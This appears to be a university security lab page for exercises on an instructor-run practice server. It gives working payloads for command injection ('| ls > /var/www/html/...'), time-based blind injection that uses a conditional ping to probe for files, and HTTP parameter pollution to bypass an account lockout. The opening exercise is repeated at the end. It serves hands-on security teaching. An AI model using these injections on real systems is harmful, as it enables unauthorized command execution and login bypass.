Sam Bowne

1. Side-Channel

Network Test

Target:

Goal: View output of "ls"

Solution

google.com | ls > /var/www/html/YOURNAME.htm
Then view https://attack.samsclass.info/YOURNAME.htm

2. Time-Based

Network Test

Target:

Goal: Determine if a file named "/tmp/flag" exists

Injections to Try

google.com | ls > /var/www/html/YOURNAME.htm
Fails because < and > are filtered.
google.com | if [ -f /tmp/flag ]; then ping -c 10 8.8.8.8; fi;ls
Fast because the file doesn't exist
google.com | if [ -f /tmp/netok ]; then ping -c 10 8.8.8.8; fi;ls
Slow because the file does exist

Challenge 2a (10 pts. extra credit)

There is a file in /usr/local/secret with a one-digit filename between 0 and 9. Find that filename.

Challenge 2b (10 pts. extra credit)

There is a file in /usr/local/secret with a three-digit filename between 000 and 999. Find that filename.

Challenge 2c (10 pts. extra credit)

There is a file in /usr/local/secret with a nine-digit filename between 000000000 and 999999999. Find that filename.

3. HTTP Parameter Pollution

Log In

Username:

Password:

The administrator punished wally for using a password of "wally" by locking his accout out.

Goal: Sign in as "wally" anyway.

Solution

Log in with this username:
wally&lockout=0
The URL becomes this, and the second parameter assignment wins on my server.
https://attack.samsclass.info/hpp1b.php?lockout=1&username=wally&lockout=0&password=wally

1. Side-Channel

Network Test

Target:

Goal: View output of "ls"

Solution

google.com | ls > /var/www/html/YOURNAME.htm
Then view https://attack.samsclass.info/YOURNAME.htm


Last modified: 9-26-16 8:52 am